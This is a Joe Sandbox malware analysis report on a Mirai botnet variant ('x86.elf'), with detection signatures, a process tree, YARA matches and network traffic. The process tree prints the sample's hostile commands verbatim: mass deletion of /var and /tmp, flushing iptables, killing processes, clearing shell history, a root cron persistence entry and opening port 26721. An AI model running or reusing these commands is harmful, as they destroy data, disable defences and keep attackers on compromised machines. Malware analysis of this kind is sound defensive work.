Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86.elf

Overview

General Information

Sample name:x86.elf
Analysis ID:1526774
MD5:99fc77d3b5e1fc2d3242ca25b4624389
SHA1:3103f833991e51be8cdd434194383bd12c0b0a2f
SHA256:376b7113fb1a872e9403c95d2930fcea98f90fb702500009ed0557d2df806785
Tags:user-elfdigest
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Machine Learning detection for sample
Manipulation of devices in /dev
Sample deletes itself
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1526774
Start date and time:2024-10-06 15:51:11 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 35s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86.elf
Detection:MAL
Classification:mal96.spre.troj.evad.linELF@0/2@49/0

Warnings

  • Connection to analysis system has been lost, crash info: Unknown

Runtime Messages

Command:/tmp/x86.elf
PID:5492
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Octopus Caught You
Standard Error:Failed to stop iptables.service: Unit iptables.service not loaded.
Failed to stop firewall.service: Unit firewall.service not loaded.
sh: 1: history: not found
sh: 1: history: not found

Process Tree

  • system is lnxubuntu20
  • x86.elf (PID: 5492, Parent: 5417, MD5: 99fc77d3b5e1fc2d3242ca25b4624389) Arguments: /tmp/x86.elf
    • x86.elf New Fork (PID: 5493, Parent: 5492)
    • sh (PID: 5493, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
      • sh New Fork (PID: 5494, Parent: 5493)
      • rm (PID: 5494, Parent: 5493, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/config-err-jFiNWb /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-qf3lAyPpWVCU /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-OhEyzg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-8ySu1e /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-iKxwVi /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-ol8bni /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-LPFY4g /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-O3uVvg /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-r702ki /tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-CBTCVe /tmp/vmware-root_726-2957583432 /tmp/x86.elf /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-ModemManager.service-K5j1Of /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-colord.service-sPszWi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-fwupd.service-kdgXJf /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-switcheroo-control.service-EvKsMg /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-logind.service-0DTUmj /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-resolved.service-fe4hsi /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-systemd-timedated.service-K1ZmQh /var/tmp/systemd-private-aa7ef13c7a2d44d8a04d54e61953176a-upower.service-Lb1VUf /var/log/wtmp
    • x86.elf New Fork (PID: 5502, Parent: 5492)
    • sh (PID: 5502, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /tmp/*"
      • sh New Fork (PID: 5503, Parent: 5502)
      • rm (PID: 5503, Parent: 5502, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
    • x86.elf New Fork (PID: 5504, Parent: 5492)
    • sh (PID: 5504, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -F"
      • sh New Fork (PID: 5505, Parent: 5504)
      • iptables (PID: 5505, Parent: 5504, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • x86.elf New Fork (PID: 5509, Parent: 5492)
    • sh (PID: 5509, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 busybox"
      • sh New Fork (PID: 5510, Parent: 5509)
      • pkill (PID: 5510, Parent: 5509, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
    • x86.elf New Fork (PID: 5518, Parent: 5492)
    • sh (PID: 5518, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 perl"
      • sh New Fork (PID: 5519, Parent: 5518)
      • pkill (PID: 5519, Parent: 5518, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
    • x86.elf New Fork (PID: 5520, Parent: 5492)
    • sh (PID: 5520, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -9 python"
      • sh New Fork (PID: 5523, Parent: 5520)
      • pkill (PID: 5523, Parent: 5520, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
    • x86.elf New Fork (PID: 5526, Parent: 5492)
    • sh (PID: 5526, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service iptables stop"
      • sh New Fork (PID: 5527, Parent: 5526)
      • service (PID: 5527, Parent: 5526, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
        • service New Fork (PID: 5528, Parent: 5527)
        • basename (PID: 5528, Parent: 5527, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5529, Parent: 5527)
        • basename (PID: 5529, Parent: 5527, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5530, Parent: 5527)
        • systemctl (PID: 5530, Parent: 5527, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5531, Parent: 5527)
          • service New Fork (PID: 5532, Parent: 5531)
          • systemctl (PID: 5532, Parent: 5531, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5533, Parent: 5531)
          • sed (PID: 5533, Parent: 5531, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5527, Parent: 5526, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
    • x86.elf New Fork (PID: 5534, Parent: 5492)
    • sh (PID: 5534, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/sbin/iptables -F; /sbin/iptables -X"
      • sh New Fork (PID: 5535, Parent: 5534)
      • iptables (PID: 5535, Parent: 5534, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
      • sh New Fork (PID: 5537, Parent: 5534)
      • iptables (PID: 5537, Parent: 5534, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
    • x86.elf New Fork (PID: 5538, Parent: 5492)
    • sh (PID: 5538, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service firewall stop"
      • sh New Fork (PID: 5539, Parent: 5538)
      • service (PID: 5539, Parent: 5538, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewall stop
        • service New Fork (PID: 5540, Parent: 5539)
        • basename (PID: 5540, Parent: 5539, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5541, Parent: 5539)
        • basename (PID: 5541, Parent: 5539, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5542, Parent: 5539)
        • systemctl (PID: 5542, Parent: 5539, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5543, Parent: 5539)
          • service New Fork (PID: 5544, Parent: 5543)
          • systemctl (PID: 5544, Parent: 5543, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5545, Parent: 5543)
          • sed (PID: 5545, Parent: 5543, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5539, Parent: 5538, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewall.service
    • x86.elf New Fork (PID: 5550, Parent: 5492)
    • sh (PID: 5550, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -c"
    • x86.elf New Fork (PID: 5551, Parent: 5492)
    • sh (PID: 5551, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf ~/.bash_history"
      • sh New Fork (PID: 5552, Parent: 5551)
      • rm (PID: 5552, Parent: 5551, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
    • x86.elf New Fork (PID: 5553, Parent: 5492)
    • sh (PID: 5553, Parent: 5492, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "history -w"
    • x86.elf New Fork (PID: 5555, Parent: 5492)
      • x86.elf New Fork (PID: 5556, Parent: 5555)
      • x86.elf New Fork (PID: 5557, Parent: 5555)
      • x86.elf New Fork (PID: 5558, Parent: 5555)
        • x86.elf New Fork (PID: 5559, Parent: 5558)
        • sh (PID: 5559, Parent: 5558, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /dev/ocmount"
          • sh New Fork (PID: 5580, Parent: 5559)
          • chmod (PID: 5580, Parent: 5559, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /dev/ocmount
        • x86.elf New Fork (PID: 5581, Parent: 5558)
        • sh (PID: 5581, Parent: 5558, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
        • x86.elf New Fork (PID: 5631, Parent: 5558)
        • sh (PID: 5631, Parent: 5558, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /dev/ocmount
          • sh New Fork (PID: 5637, Parent: 5631)
        • x86.elf New Fork (PID: 5839, Parent: 5558)
          • x86.elf New Fork (PID: 5841, Parent: 5839)
          • sh (PID: 5841, Parent: 5839, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5850, Parent: 5841)
            • iptables (PID: 5850, Parent: 5841, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • x86.elf New Fork (PID: 5854, Parent: 5839)
          • sh (PID: 5854, Parent: 5839, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5855, Parent: 5854)
            • busybox (PID: 5855, Parent: 5854, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • x86.elf New Fork (PID: 5856, Parent: 5839)
          • sh (PID: 5856, Parent: 5839, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5857, Parent: 5856)
          • x86.elf New Fork (PID: 5869, Parent: 5839)
          • sh (PID: 5869, Parent: 5839, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5871, Parent: 5869)
          • x86.elf New Fork (PID: 5872, Parent: 5839)
          • sh (PID: 5872, Parent: 5839, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5873, Parent: 5872)
            • busybox (PID: 5873, Parent: 5872, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • x86.elf New Fork (PID: 5840, Parent: 5558)
        • x86.elf New Fork (PID: 5842, Parent: 5558)
          • x86.elf New Fork (PID: 5843, Parent: 5842)
      • x86.elf New Fork (PID: 5858, Parent: 5555)
        • x86.elf New Fork (PID: 5860, Parent: 5858)
        • sh (PID: 5860, Parent: 5858, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5870, Parent: 5860)
          • iptables (PID: 5870, Parent: 5860, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • x86.elf New Fork (PID: 5876, Parent: 5858)
        • sh (PID: 5876, Parent: 5858, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5877, Parent: 5876)
          • busybox (PID: 5877, Parent: 5876, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • x86.elf New Fork (PID: 5878, Parent: 5858)
        • sh (PID: 5878, Parent: 5858, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5879, Parent: 5878)
        • x86.elf New Fork (PID: 5880, Parent: 5858)
        • sh (PID: 5880, Parent: 5858, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5881, Parent: 5880)
        • x86.elf New Fork (PID: 5882, Parent: 5858)
        • sh (PID: 5882, Parent: 5858, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5883, Parent: 5882)
          • busybox (PID: 5883, Parent: 5882, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
      • x86.elf New Fork (PID: 5859, Parent: 5555)
      • x86.elf New Fork (PID: 5861, Parent: 5555)
        • x86.elf New Fork (PID: 5862, Parent: 5861)
  • sh (PID: 5587, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
  • gsd-sharing (PID: 5587, Parent: 1383, MD5: e29d9025d98590fbb69f89fdbd4438b3) Arguments: /usr/libexec/gsd-sharing
  • systemd New Fork (PID: 5588, Parent: 1)
  • upowerd (PID: 5588, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5616, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
  • gsd-wacom (PID: 5616, Parent: 1383, MD5: 13778dd1a23a4e94ddc17ac9caa4fcc1) Arguments: /usr/libexec/gsd-wacom
  • sh (PID: 5635, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
  • gsd-keyboard (PID: 5635, Parent: 1383, MD5: 8e288fd17c80bb0a1148b964b2ac2279) Arguments: /usr/libexec/gsd-keyboard
  • sh (PID: 5636, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5636, Parent: 1383, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • systemd New Fork (PID: 5638, Parent: 1)
  • upowerd (PID: 5638, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • sh (PID: 5683, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
  • gsd-smartcard (PID: 5683, Parent: 1383, MD5: ea1fbd7f62e4cd0331eae2ef754ee605) Arguments: /usr/libexec/gsd-smartcard
  • fusermount (PID: 5684, Parent: 3147, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5685, Parent: 1)
  • upowerd (PID: 5685, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • wrapper-2.0 (PID: 5708, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5731, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • sh (PID: 5732, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
  • gsd-media-keys (PID: 5732, Parent: 1383, MD5: a425448c135afb4b8bfd79cc0b6b74da) Arguments: /usr/libexec/gsd-media-keys
  • wrapper-2.0 (PID: 5733, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • sh (PID: 5734, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
  • gsd-screensaver-proxy (PID: 5734, Parent: 1383, MD5: 77e309450c87dceee43f1a9e50cc0d02) Arguments: /usr/libexec/gsd-screensaver-proxy
  • systemd New Fork (PID: 5735, Parent: 1)
  • upowerd (PID: 5735, Parent: 1, MD5: 1253eea2fe5fe4017069664284e326cd) Arguments: /usr/lib/upower/upowerd
  • wrapper-2.0 (PID: 5776, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • sh (PID: 5777, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
  • gsd-sound (PID: 5777, Parent: 1383, MD5: 4c7d3fb993463337b4a0eb5c80c760ee) Arguments: /usr/libexec/gsd-sound
  • wrapper-2.0 (PID: 5786, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • systemd New Fork (PID: 5790, Parent: 1)
  • wrapper-2.0 (PID: 5801, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • sh (PID: 5822, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 5822, Parent: 1383, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • sh (PID: 5832, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
  • gsd-power (PID: 5832, Parent: 1383, MD5: 28b8e1b43c3e7f1db6741ea1ecd978b7) Arguments: /usr/libexec/gsd-power
  • udisksd New Fork (PID: 5849, Parent: 803)
  • dumpe2fs (PID: 5849, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/sda2
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    x86.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
    • 0x14539:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
    x86.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
    • 0x9fc0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
    x86.elfLinux_Trojan_Mirai_5f7b67b8unknownunknown
    • 0x10da0:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
    x86.elfLinux_Trojan_Mirai_88de437funknownunknown
    • 0xae62:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
    Click to see the 4 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5492.1.0000000008048000.0000000008064000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5492.1.0000000008048000.0000000008064000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
      • 0x14539:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
      5492.1.0000000008048000.0000000008064000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x9fc0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      5492.1.0000000008048000.0000000008064000.r-x.sdmpLinux_Trojan_Mirai_5f7b67b8unknownunknown
      • 0x10da0:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
      5492.1.0000000008048000.0000000008064000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
      • 0xae62:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
      Click to see the 13 entries

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: x86.elfReversingLabs: Detection: 55%
      Source: x86.elfVirustotal: Detection: 35%Perma Link
      Machine Learning detection for sample
      Source: x86.elfJoe Sandbox ML: detected
      Source: /usr/bin/pkill (PID: 5510)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 5519)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 5523)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

      Networking

      barindex
      Executes the "iptables" command to insert, remove and/or manipulate rules
      Source: /bin/sh (PID: 5850)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Source: /bin/sh (PID: 5870)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Tries to stop the "iptables" service
      Source: /usr/sbin/service (PID: 5527)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
      Source: /usr/sbin/service (PID: 5527)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
      Source: global trafficTCP traffic: 192.168.2.14:34156 -> 156.238.224.214:8443
      Source: global trafficTCP traffic: 192.168.2.14:34872 -> 212.118.43.167:2222
      Source: /bin/sh (PID: 5505)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
      Source: /bin/sh (PID: 5535)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
      Source: /bin/sh (PID: 5537)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
      Source: /bin/sh (PID: 5850)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Source: /bin/sh (PID: 5870)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
      Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
